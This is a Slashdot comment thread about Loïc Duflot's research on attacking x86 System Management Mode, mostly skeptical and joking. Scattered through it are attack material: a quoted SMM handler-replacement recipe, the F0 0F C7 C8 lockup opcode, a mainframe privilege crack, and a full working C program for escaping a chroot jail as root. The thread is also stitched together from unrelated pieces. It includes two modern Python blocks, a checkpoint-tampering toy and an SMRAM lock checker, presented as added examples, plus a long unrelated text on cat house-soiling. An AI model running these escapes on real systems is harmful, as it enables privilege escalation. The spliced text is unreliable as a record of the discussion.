Pentium Computers Vulnerable to Attack?
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
physical access means the h4x0rs can take over your computer now, news at 11.
What am I missing here? If they already have that much access to the system, aren't you already screwed?
someone could do the same with ANY interrupt handler... oh wait... an MMU would protect against that.
Not a lot of details about which chip families are affected... Does it cross over to AMD chips?
Physical access trumps all security. Everyone knows this. This really isn't news, just an interesting new exploit that happens to affect a lot of... systems that are already vulnerable from the same people in the same situation.
Move along, folks.
I pretend to know more than I really do by mooching off google and wikipedia.
So anyone have any idea which Intel Pentiums processors that are affected by this? Every Intel processor with overheat protection?
The article states this could be a problem for all x86 processors. Do older processors even have heat management? Also, wouldn't you need admin access to the system to be able to trigger this?
Open source is like a British car. Not only can I get under the hood, I seem to spend a lot of time here.
This hack assumes that the intruder already has write access to the nvram of the system. Also, the headline is just a cut/paste of a small portion of a poor article with few technical details. There is no PoC code, nor any specific chip mentioned. The headline refers to Pentium chips specifically and the article says "any x86 based architecture"; needless to say these are not interchangeable terms... Shame on you Slashdot editors for posting this garbage...
-*The above statement is printed entirely on recycled electrons*-
How is it that an unprivileged user can write to such a sensitive location in the first place?
Bogtha Bogtha Bogtha
I am so glad that we have legions of Security Experts to protect us against every possible Rube Goldberg attack out there. Thanks to their tireless commitment to security, I can sleep safer at night by knowing that no one will take a blowtorch to my processor, install custom software, and then override the security safeguards that they could have gotten through by booting into safe mode. These people are truly a God-send. </sarcasm>
Javascript + Nintendo DSi = DSiCade
Duflot could be translated from french to "From The Flow"
Remember that old Good Times virus hoax? People who were In The Know knew that it was a hoax because it claimed that, just by opening it, it could physically destroy your computer.
:)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
I'm no security expert, but I don't see how this inherently indicates any particular vulnerability:
Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.
How do they 'enter System Management RAM'? Presumably this is a local attack where you plug in some hardware to do this while the computer is asleep. How could this possibly work over a network? You also have to make the machine overheat...
Any more knowledgeable speculation on the real threat posed by this?
Cool, another reason to switch to Sun or AMD.
This attack would already require the malicious software to already be running on the machine and already have super-user access. Once you get there, it doesn't matter. The attack is worthless. Unfortunately, the article is short on details - so you can't tell if there is nothing to see, or if the report is just bad. I suspect there is nothing to see.
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
Exactly how is this news??? Are slashdot readers getting stupider by the day? With physical access anything can be broken, it's just a matter of a longer or shorter time lapse.
Pentium computers are vulnerable to baseball bats!
Seriously, if they have access then you are screwed anyways...
- Andrew
I meta-moderate because I care.
New Security Rule: Keep your wife's hair dryer out of the computer room!
It's not just about recouping losses, it is about making the criminals - and that IS what these people are - fear the consequences of creating this type of thing. It seems like almost every day some new exploit is announced and we all have to check systems, hope for a quick patch, worry about exposure, yada yada yada. I'm fed up with it as I'm sure most other admins are.
Get caught creating a virus? 50 years in prison.
You run a botnet? 50 years in prison.
You cracked into the Defense Department? Life in prison.
We need to stop slapping these a-holes on the wrist and make the punishment severe enough to deter at least SOME of them.
"I'm just here to regulate funkiness."
I remember the good old days when you could send the instructions F0 0F to the Intel CPU and voila... crash!
Meh.
This was a script for a Geekdom show..
I guess I didn't understand the article, but how are these people without any access (yet) to my system causing my CPU to overheat at will? Does this have to do with global warming and my AC crapping out? EH? I knew it was a damn conspiracy against me!
*/equip [EpicTinfoilhat]
More seriously why do they say Pentium at the top and any x86 later on... those don't mean the same thing...
Matt
You have 1 Moderator Point! Use it or lose it! Is that a threat? -vapid
This is fantastic..now Antivirus tools can start monitoring my PC's temperature...anything above 98F and we've got to call the doctor.
Hellooooo: When the processor begins to overheat...
Keeping the computer cool is most certainly on topic!
P.S. Strawberry works best.
So, if I have a real firewall setup and I don't open every attachment I'm sent, I'm still safe, right? At the end of the day, you still have to run the exploit for it to work. So, how is that any worse than the rootkits running around at the moment? The vast majority of viruses still specifically depend on users who haven't hardened their systems.
I scream. You scream. I assume that means we're both acquainted with the problem. We proceed.
Man, I better switch to AMD so I won't have to worry about viruses! *rolls eyes* Interesting info no doubt, but I hope this doesn't turn into an AMD is teh better fanboy episode... oh wait this is slashdot.
What??? Overheat? So what does attacker have to do, block off all air holes? And what??? System Management RAM? You mean, like Remote Management module like HP's iLO access?
I heard, act of God includes "stupidity".
"Don't let fools fool you. They are the clever ones."
Just as dangerous, system analysts discovered an intruder can come with a CD, install malware and run it.
To protect yourself from an attack, it's recommended to never install anything on your computer and remove all sorts of input devices such as USB ports, CD-ROMs, floppies.
Turn it on?
It was a joke! When you give me that look it was a joke.
"You also have to make the machine overheat..."
They're Intel. No effort required.
Just went and RTFA, and I'm frustrated by a lack of hard details about the new threat:
:-(
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
"All hands, BRACE FOR IMPACT!"
You were 80% angel, 10% demon. The rest was hard to explain. - Over The Rhine
"Math in a song is good."-Linford
of falsehood, and to execute such a thing you'd be at a low enough level to wreak havoc anyway.
Yet another reason AMD is better than Intel!
Why? I don't think anybody immunized AMD against screwing up, they are just as capable of it as Intel.
I wonder if this affects the new Intel Macs?
I'll reserve the right to modify my opinion after familiarizing myself with the details of the nature of this vulnerability. As a first guess I'll hypothesize that this probably depends on how easy the OS running on the affected Intel box makes it for a remote attacker to exploit this hardware flaw.
Only to idiots, are orders laws.
-- Henning von Tresckow
to use some other exploit? I mean the steps and time involved to use this would be too long to really be effective, since you have to wait until the machine actually overheats to get to this situation. What's the MTBF for a CPU fan these days? 50-70K hrs? They'll be waiting a while to gain admin access.
Supplies!
I'm interested in how a foreign company is in effect competing with Intel not by being a better vendor to Intel's customers, but by being a more demanding customer than Intel's other customers. They're really only half competing, by threatening the value of Intel's products perceived by the market, the same way a competing vendor would, though they're not doing the other half: offering a competing product that offers better perceived value to the market. Another vendor could do so, finding half their competition process already done for them,
Technology industries used to be nearly entirely "supply-side": driven by suppliers. Unpredictable innovation requiring risky investment, costs of production scaling and distribution, securing free-flowing intellectual property all defined a market always hungry for something newer, faster, smaller, safer. The market itself helped control the industry mainly to the extent that suppliers could guess what the market wanted. We're seeing the market gain power over the industry in many ways. Now we're seeing consumer processes actually resemble competition previously only performed by other producers.
--
make install -not war
If the physical location of your servers is compromised, no amount of security software can save you.
ELOI, ELOI, LAMA SABACHTHANI!?
Karma: Chameleon (mostly due to the fact that you come and go).
This is pure FUD, why is it even posted here? The article was mildly interesting but the title was misleading and blatantly AMD fanboy. While I realize that is popular around here give me a break... if you want a real processor war do it on fair grounds, not mud slinging.
booting from cd found to allow hackers to change root password
I can't find the actual paper anywhere, but this blog posting has way more details than the article originally linked ...
Very interestingly, Windows XP is not vulnerable, but OpenBSD is.
My Intel machine has Linux and my Windows Machines are AMDs
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
Oooo, it's sooo hot. yeah, baby... yeah, daddy like... daddy like...
Relax, I just got an email (that Thunderbird thought was a scam - you truly do get what you pay for...) with a link in it that automatically downloaded me a new processor (Pentium6 baby)...
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Let me get this right, by DoSing the proc someone can overwrite the embedded code on the chip? If someone already owned the box and were to use this, it sounds like it would be the ultimate rootkit. Place in the proc, then when the system is hardened/reloaded initiate another DoS (lots are available for winblows) and voilà, instant re-infected Zombie PC.
Or am I confused?
How do you even get it to overheat to begin with?
Well, I generally like to compliment it on how pretty its power-on indicator is.
Then I might buy it something small, superfluous and pretty like a tennis bracelet or an X800 Radeon.
After that I start gently caressing its biometric module.
That generally gets it pretty hot...
I am disrespectful to dirt! Can you see that I am serious?!
On a scale of 1 to 10, I think this threat is somewhere between 0.5 and 1.5. There are so many better ways to invade a computer than to somehow sneak this on there and wait for the machine to overheat. Especially now since the vulnerability has been exposed, I'm sure the big time virus vendors will now write code to look for it.
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to build and execute (in the wild) an exploit based on this.
This reminds me of the vulnerability in the operating system that shipped with the Univac 1100/10. The checkpoint/restart facility allowed you to write a checkpoint image to tape. Part of the checkpoint image was the system status register.
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPUs out of vacuum tubes.
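The checkpoint/restart crack above is a clean instance of a privilege attribute being read back from data the subject controls. The toy below (an added example, not code from the Univac system or from anyone in this thread) replays it on a made-up checkpoint format: a "status" word whose bit 15 stands in for the executive-mode bit (layout assumed for illustration). `naive_restart` honours whatever is on the tape, so flipping the bit works; `verified_restart` seals the image with an HMAC under a key only the executive holds and, independently of that, takes the privilege decision from policy rather than from the image. All inputs are constructed inline.

```python
import hashlib
import hmac
import json

# Toy status register: bit 15 plays the role of the executive-mode bit
# (assumed layout for illustration, not the real 1100-series status word).
EXEC_MODE = 0x8000


def checkpoint(job):
    """Serialise a job (registers plus status word) the way the old dump did:
    plain data with nothing that authenticates it."""
    return json.dumps(job, sort_keys=True).encode()


def naive_restart(image):
    """Restore a job trusting every field on the tape, exec bit included."""
    return json.loads(image)


def flip_exec_bit(image):
    """Step 3 of the crack: set the executive-mode bit in the dumped status."""
    job = json.loads(image)
    job["status"] |= EXEC_MODE
    return checkpoint(job)


def is_privileged(job):
    return bool(job["status"] & EXEC_MODE)


def seal(image, key):
    """Hardened dump: append an HMAC computed with a key only the executive holds."""
    tag = hmac.new(key, image, hashlib.sha256).hexdigest().encode()
    return image + b"\n" + tag


def verified_restart(sealed_image, key, owner_may_run_exec):
    """Hardened restart: reject a tampered image, and even for a genuine one
    take the privilege decision from policy rather than from the tape."""
    body, sep, tag = sealed_image.rpartition(b"\n")
    if not sep:
        raise ValueError("checkpoint image carries no tag")
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("checkpoint image was modified")
    job = json.loads(body)
    if not owner_may_run_exec:
        job["status"] &= ~EXEC_MODE
    return job


def demo():
    """Run the crack against both restart paths; returns (naive_owned, hardened_blocked)."""
    key = b"executive-only-key"                      # constructed for the demo
    job = {"owner": "student", "pc": 0x1234, "status": 0x0001}

    # Unauthenticated tape: the flipped bit is honoured on restart.
    naive_owned = is_privileged(naive_restart(flip_exec_bit(checkpoint(job))))

    # Sealed tape: flipping the bit breaks the tag, so restart refuses it.
    body, _, tag = seal(checkpoint(job), key).rpartition(b"\n")
    try:
        verified_restart(flip_exec_bit(body) + b"\n" + tag, key, False)
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    return naive_owned, hardened_blocked
```

`demo()` returns `(True, True)`: the unauthenticated restart hands out executive mode, the sealed one refuses the edited tape. The second defence matters on its own: if the key ever leaks, `owner_may_run_exec=False` still strips the bit, because the restorer never lets the image decide privilege.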
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
The article does NOT explain how the hacker is able to replace the "emergency-response software" in System Management RAM. Normal applications, running at privilege level 3, don't have direct access to SM RAM. Only code running at privilege level 0, such as kernels and device drivers, can directly access SM RAM. But, if you can manage to run code at privilege level 0 to access SM RAM, you don't need to replace the code in SM RAM to take over the system.
As was implied by at least one other comment, the article describes a "Rube Goldberg" approach to hacking a system. While potentially entertaining, the method is overly and unnecessarily complicated to achieve the end result.
That was the sound of the GP going right over your head.
Recently, researchers discovered a new hardware specific attack that could render virtually all computers vulnerable to attackers. They said that if an attacker gains access to the keyboard, they could inject any arbitrary code into the system and gain administrative privileges.
Do not leave your servers out in the open, lock them in a controlled access room (perhaps climate control as well). Thoroughly vet who gets into your server room. Additionally, do not let people who have low access levels access 'low levels' of the machine. This is revolutionary... in 20 years I can see it being commonplace for companies to have a "server room". Outstanding research, guys.
I made this post "Captain Cliche" enough for people to get it. Obviously not.
I remember someone once mentioning that a certain kind of computer (quite old, I forget which) could be forced to shut down by repeatedly using gates/ram directly beneath the temperature sensor.
This kind of thing should be possible remotely, as an unprivileged user, and also doesn't require the system to actually overheat, just those few gates.
Try F0 0F C7 C8.
LRC, the best-read libertarian site on the web
ALERT!
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Fear: When you see B8 00 4C CD 21 and know what it means
Did it specifically say that the machine had to overheat in order to take advantage of the exploit? or did they figure out how to trigger it remotely?
Windows has more viruses because linux has more virus coders.
Q: Oh hello Bond, be careful now, that table has a lot of expensive equipment on it. Bond: Can I surf for some p0rn on this computer? Q: Now Bond! Pay attention! That's your next target trainer. You just take this roll of duct-tape... Bond: I know, and use it to tie the hands of Mr Moto's gal-pal to the bedposts? Q: No! Bond: What other possible use could there be for this stuff?? Q: Oh Bond, you take a piece of it and, while sipping a Martini (shaken, not stirred) with one hand, you surreptitiously slap the piece over the arch-villain's computer's FAN. Bond: Sigh, how prosaic! ... Then do I tie up the bimbo?
Q: No, Bond, you make dashing small talk and repartee with the bad guy, while you pull this little floppy disk out of your pocket...
Bond: And sling it at his neck, decapitating him?
Q: No, you reboot the computer so it boots up from the floppy into unprotected mode, then AUTOEXEC.BAT copies our file to OVERHT.DLL. Then in a few minutes the computer overheats and the overheat interrupt calls our code! Brilliant work by my boffins I think!
Bond: Well, if I weren't just as dumb as Sean Connery I'd wonder why you have the overheat handler do the dirty work, as our rebooting could have done the same thing.
Q: Now Bond, do you think anybody would want this movie to be over by the first reel? There has to be ominous music, brooding shadows, knives in the back, and so on. We can never do the obvious things.... You should know that by now...
Bond: Sigh, you're right as usual Q. DLL patching it is.
Since the Rag, of which this article is a part, supposedly targets government institutions, this could be important information for some.
Yes, it is true that physical access "trumps" any other security issues. However, if a person has physical access to a system, it could be quite possible that this system has several other safeguards enabled on it to prevent access to any files stored on it. So, somebody being able to pop in a bootable CD that can boot the system, run some CPU-intensive code on it (thereby overheating the CPU), and then inserting the code to circumvent those extra security measures, could (in theory) gain access to those secure government files*.
Be it for corporate/government espionage, I could see this being a valuable tool for data acquirement, for the purpose(s) of personal, monetary, technological, military, personal (etc.) gain.
*Files: Could include top secret data of a -> military/pornographic/intelligence/pornographic/e
So, here's a link to the actual PowerPoint presentation. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security engineer and researcher for the scientific division of the french Central Directorate for Information Systems Security in Paris. He is also a 2nd-year Phd student in Paris XI university. His research work is mostly focused on the security aspects of interactions between hardware components and software. He's also interested in innovative hardware attacks on cryptographic tokens and smartcards.
Note that the French have one of the best security agencies in the world. The main caveat is whether there's anything in the PPT presentation which can exploit your system. I wouldn't put it past the French whatsoever. So, you might be wise to view the presentation on a secure system of yours (preferably not an x86 one? :) ).
The best way to predict the future is to create it. - Peter Drucker.
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked CPU by running massively heat-generating instructions in a tight loop that was entirely in L1 cache.
So, physical destruction could happen. It was extremely rare - most OS' are designed to place limits on program activity, and I know of only two Real World examples of such software that existed in the wild - but it was NOT unknown.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
I think it is time for all of us to buy new AMDs. And so does cashdot. Love the AMD ad on this page. So much for being reputable.
God Bless America. No, I mean my god not yours.
Pentium Computers Vulnerable to Attack?
YES! Nothing to see here, please move along.
He who knows best knows how little he knows. - Thomas Jefferson
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has system access would then be unable to exploit that to gain control of other parts of the computer. Typically, such containment is through hardware, so unless you embedded a suitable driver into the virus code, interrupting the OS wouldn't gain you anything.
On a side-note, the Broadcom Sentosa system (based on the BCM1250 processor) has a bug such that any fast maths routine will reboot the system. Explains why a lot of people hate Broadcom.
Seems like nobody was sharp enough to google, find the slides, and provide a link :P
http://www.cansecwest.com/slides06/csw06-duflot.p
Don't bother with the moronic article -- get the PowerPoint slides from the presentation at CanSecWest at http://cansecwest.com/slides06/csw06-duflot.ppt
My xt should be ok
What? I'm using an 8086 instead of the 8088
Noooo
Including a link to the presentation .ppt
http://asert.arbornetworks.com/2006/04/jumping-through-hoopshhhhhrings/
> The exploit requires escalated privileges to begin with. The only thing it can currently
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Democrat delenda est
with a magnifying glass, focusing a beam of sunlight on pentagon computers...
film at 11
/\/\icro/\/\uncher
As has been repeated, physical access beats all. Here's an easier way, why not just boot into a knoppix live cd, mount the disk and circumvent all security? Kind of like beating Adobe's security by simply using Ghostscript.
From : http://blog.ncircle.com/ (scroll down)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high-level technical details and then end with pointing out a principle that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes; one of those modes is known as Protected mode, another is known as System Mgmt Mode. When your OS is running, you're in Protected mode and this is where much of the security is performed and you'll hear of ring0 and ring3. Just know that your in-world universe is in protected mode.
System Management Mode (SMM) is used so that when there is something external to your OS world like say a thermal condition that needs to communicate some message, the CPU saves all its protected mode state out, does all this SMM stuff and then return to its regular scheduled program in protected mode.
There are details that involve register addresses and very low level operations but for the most part, a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
In the wider picture: works on most systems. Turns out that Linux and the *BSDs will fall victim to this attack strategy; however, Windows XP is not known to be exploitable because of a few system calls that are not present and, more importantly, a certain memory range in protected mode does not share addresses with SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OpenBSD issue and said he and the team have known about it for a year. They are between a rock and a hard place because Xserver is really the core of the problem. It has too much damn access to registers and is in the most unfortunate address space in protected mode, because when in SMM, what is in that address range can be used to exploit.
Solution is for the Xserver people to abstract sufficiently so that the kernel can have more governance over the Xserver's logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm it has been created in, then it is also the case that the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created an incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, that no one in our world gets control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
It's late and I have been blogging way too much today; I am certain that my mental packet loss is abnormally high. I'll return to these in-game/out-game concepts later in another blog entry, when I am less sleep deprived.
--tk
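The recipe quoted above ("Enable SMI / Open SMRAM space / Replace default SMI handler / Close SMRAM space / Trigger SMI") and the earlier comment about ring 0 code being able to reach SM RAM both hinge on one chipset bit: whether the host bridge still lets anyone set D_OPEN. The decoder below is an added example, not code from Duflot's slides or from the blog quoted here. It assumes the SMRAMC register layout of an Intel 82865-era host bridge (PCI device 0000:00:00.0, config offset 0x9D, with D_OPEN at bit 6, D_CLS at bit 5, D_LCK at bit 4, G_SMRAME at bit 3); other chipsets place the register elsewhere, so confirm the offset against the datasheet before believing the verdict on real hardware. The sample dumps are constructed inline; `read_live_config` shows where the real bytes come from on Linux.

```python
# Bit layout assumed for illustration: SMRAMC of an Intel 82865-era host
# bridge (PCI 0000:00:00.0, config offset 0x9D). Verify against the datasheet
# for your chipset before trusting the offset on real hardware.
SMRAMC_OFFSET = 0x9D
D_OPEN = 1 << 6      # SMRAM visible in the normal address space (the "open" step)
D_CLS = 1 << 5       # SMRAM closed to non-SMM data accesses
D_LCK = 1 << 4       # lock: D_OPEN becomes read-only until the next reset
G_SMRAME = 1 << 3    # SMRAM enabled at all


def decode_smramc(config_space, offset=SMRAMC_OFFSET):
    """Pull the SMRAMC bits out of a raw PCI config-space dump."""
    if len(config_space) <= offset:
        raise ValueError("config space dump too short")
    raw = config_space[offset]
    return {
        "raw": raw,
        "enabled": bool(raw & G_SMRAME),
        "open": bool(raw & D_OPEN),
        "closed": bool(raw & D_CLS),
        "locked": bool(raw & D_LCK),
    }


def assess(config_space):
    """Verdict for the 'Open SMRAM space' step of the recipe."""
    s = decode_smramc(config_space)
    if not s["enabled"]:
        return "smram-disabled"
    if s["open"]:
        return "smram-already-open"      # handler readable and writable right now
    if s["locked"]:
        return "locked"                  # D_OPEN cannot be set until reset
    return "openable"                    # ring 0 can flip D_OPEN: the step works


def read_live_config(path="/sys/bus/pci/devices/0000:00:00.0/config"):
    """Read the host bridge's config space on Linux (root for all 256 bytes)."""
    with open(path, "rb") as f:
        return f.read()


def sample_dump(smramc_byte):
    """Constructed 256-byte config-space image with only SMRAMC populated."""
    buf = bytearray(256)
    buf[SMRAMC_OFFSET] = smramc_byte
    return bytes(buf)
```

`assess(sample_dump(0x0A))` (SMRAM enabled, base segment A0000, nothing locked) returns `"openable"`, which is the state the recipe needs; `0x1A` returns `"locked"`. The point for a defender is that D_LCK is a one-way bit the BIOS is supposed to set before handing over to the OS; if your firmware leaves it clear, the Xserver-with-register-access problem Theo describes is the only thing standing between root and a new SMI handler.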
http://hardware.slashdot.org/comments.pl?sid=182786&cid=15108037
Not if you can find a way to have the target heat up with a user account.
Better article: http://hardware.slashdot.org/comments.pl?sid=1827
On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticably when run in a server
Athlon XP 2500+ - Holy freakin' heatwave, Batman, this chip ran warm indeed. I stuck a "Volcano" fan on it to keep it happy during heavy operations, but then it sounded like, well... a vacuum cleaner. When I accidentally turned the fan down during some heavy operations it hit 100C before thermal throttling kicked it off (though it should have dumped a lot earlier).
Wewl, to begin wit, you puon Nelly. Den it gits hot in hea.
Why figure out something tricky and clever like an overheat-interrupt-security-rescue-procedure-overw rite-thingamajig when all you gotta do is send mails with an "for infection please click here" buttons?
Works just as fine.
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
AthlonXP chips had no built in throttling in the chip. As a result, motherboard makers built in a crude protection system that would shut down the entire system if the chip got too hot. Without that protection, the chips would burn themselves up if the fan failed.
G
New AMD (Sempron 64/Athlon 64/Athlon X2 64, Turion) all have "Cool 'n' Quiet" built in which throttles the chip down to speeds as low as 1Ghz (even lower on Turions I think) when idle. I have a dual core Athlon system now, and my chip sits at 1Ghz/1.1 volts and my CPU fan runs at 1000RPM when my computer is idle. When you launch an app that demands processing power, the chip instantly throttles up to its full speed/voltage and the fan kicks up to 3000RPM.
Pictures:
http://www.toadlife.net/stuff/forum_pics/idle.PNG
http://www.toadlife.net/stuff/forum_pics/inuse.PN
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
http://www.cs.princeton.edu/~sudhakar/papers/memerr-slashdot-commentary.html
/.'d back in '03. *Kind of* similar.....
Yea, it was
I Attacked a pentium PC with a sledgehammer. It was quite vulnerable.
Okay, a rock will do.
Considering:
- that the hacker would need really good access to your Pentium computer in order to do such an exploit.
- that if the processor overheats then some hacker gaining administrator access is the least of your problems.
- that windows and internet explorer are still quite popular
There are plenty of more effective and practical ways to take down PCs, seriously.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Classic chroot() escape. Needs root inside the jail (chroot() itself is
 * a privileged call), which is exactly the poster's point.
 *   argv[1]  an existing subdirectory inside the jail
 *   argv[2..] program (and args) to run once outside */
int main(int argc, char **argv)
{
    int i;
    if (argc < 3) {
        fprintf(stderr, "usage: %s <subdir-in-jail> <program> [args...]\n", argv[0]);
        exit(1);
    }
    /* chroot() does not change the cwd, so after this call our cwd lies
     * outside the new root and ".." is no longer clamped to it. */
    if (chroot(argv[1])) {
        perror("chroot");
        exit(1);
    }
    /* Walk up until we reach the real root (".." on "/" stays on "/"). */
    for (i = 0; i < 137; i++)
        chdir("..");
    /* Make the real root our root again. */
    if (chroot(".")) {
        perror("second chroot");
        exit(1);
    }
    execv(argv[2], argv + 2);
    perror("exec");
    exit(1);
}
N.B. BSD jails do something more than just chroot. However, on most Unices, relying solely on chroot to keep an attacker "prisoner" is foolish...
Some filler garbage to pass the postercomment compression filter (sorry):
Why is my cat not house-trained?
In veterinary medicine, the most frequently encountered behavioural problem in cats is house soiling. Kitty pees or poops outside the litter box and the owner doesn't know what to do.
So it's normal that this question is put to us very often! And we will try to summarize the approach you will need to take to quickly put an end to this unpleasant problem.
It is understood that it is impossible for us to analyse each case individually via the Internet, by phone or across a counter, because too many variables come into play, and a consultation with a NATUROPATH specializing in behavioural therapy can easily last more than an hour for this kind of problem.
To help you understand the steps involved in this type of consultation, here is a series of questions that must absolutely be put to the cat's owner before an assessment can be made and possible solutions considered. In fact, there are three forms of house soiling: elimination soiling, marking, and incontinence. The questionnaire below and a physical examination of the animal will above all allow us to tell them apart and, most importantly, to avoid false leads. Only then will we be in a position to make the necessary recommendations.
1. How many other cats or animals do you have at home?
2. What is the relationship between these animals?
3. How did you identify the culprit? When and how did the problem start?
4. How often is the cat unclean? (daily, a few times a week, per month)
5. What tricks have you used to change this bad habit (corrections, changing the litter, isolation, etc.)?
6. Have you ever seen blood in your cat's urine?
7. What kind of food does your cat eat?
8. Has it ever suffered from cystitis or a urinary problem?
9. Does your cat sometimes have diarrhoea?
10. Does your cat sometimes have constipation?
11. Does poop sometimes get stuck in the fur near the anus? How many animals do you have at home?
12. Are your cat and the others neutered?
13. In what order did you acquire them?
14. How many litter boxes do you have per cat?
15. Do you have litter boxes with a lid?
16. What is the size of the
...technical articles.
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit behind control register busses. You might as well hack the ucode -- which hasn't been done in over 13 years of existence.
Getting back to the low-power C4 states, this is the same thing that occurs when HALT is executed. If someone has the technology to invade motherboard ram, or to invade the page table, then of course they can break this, but it is by NO MEANS TIED JUST TO INTEL CHIPS.
This idiot spouts off two paragraphs of something he barely understands, and then fills the rest with panicked-fluff.
Let's all move along. Nothing to see here.
This could be combined with the recent OSX flaws to make a really hard to clean, nasty MacWorm.
:-)
More FUD~!
-JP
This seems very short on detail and ignores a few key points.
Access to the System Management RAM is controlled by the chipset. Generally there is a write-once bit that, when set, prevents access to the RAM from normal operating mode. The BIOS loads SMM RAM, then sets this bit before booting the OS. So the only way an attacker could gain access to SMM RAM is to hack the BIOS or use hardware means (ICE).
As an example, the base SMM RAM lies 'under' VGA memory at 0xA0000. When SMM is entered the chipset routes accesses to DRAM instead of passing them to PCI and the video card.
Save the DOS prompt: It's an endangered species!
But it looks like there may be something real here.
